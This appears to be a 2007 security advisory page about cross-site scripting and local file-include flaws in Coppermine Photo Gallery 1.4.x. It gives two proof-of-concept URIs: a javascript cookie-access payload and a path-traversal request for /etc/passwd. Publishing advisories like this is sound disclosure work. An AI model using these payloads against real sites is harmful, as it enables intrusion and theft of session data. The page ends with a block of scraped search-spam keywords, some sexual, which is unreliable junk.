exploits , vulnerabilities , articles , Coppermine Photo Gallery Multiple Input Validation Vulnerabilities

Title	Coppermine Photo Gallery Multiple Input Validation Vulnerabilities
Published	2007-09-17-12:00AM
Updated	2007-09-18-07:30PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	L4teral is credited with discovering these vulnerabilities.
Vulnerable	Coppermine Photo Gallery 1.4.12 Coppermine Photo Gallery 1.4.11 Coppermine Photo Gallery 1.4.10 Coppermine Photo Gallery 1.4.9 Coppermine Photo Gallery 1.4.4 Coppermine Photo Gallery 1.4.2 Coppermine Photo Gallery 1.4
Not Vulnerable	Coppermine Photo Gallery 1.4.13
Code	To exploit the cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI. An attacker can exploit the local file-include issue through a browser.The following proof-of-concept URIs are available:http://www.example.com/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie) http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 00:55:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mysql crack/data Page reque masalaactr Video sex www.americ women beau AMRITA ARO burzaprace actress as z os Www sex ve C700.Com vb 3.5.6 www.ebonys videp sabnor jgfjhf mallu lesb WWW.SEXHOT WorldSex ip+board+2 lo528l /modules/r nascar t250t anusha son linux kern 1.1.2 Ashwarya h nude pictu Panwyhose ChilliSpot ip+board+2 free vidi Wap.sexygi video song www.mikesa CMS is Fre Video seks my_egaller 1234 bollywood bigboops.c Remote Roo bollywood wwwsexcome nkob sex feet p www.010jdn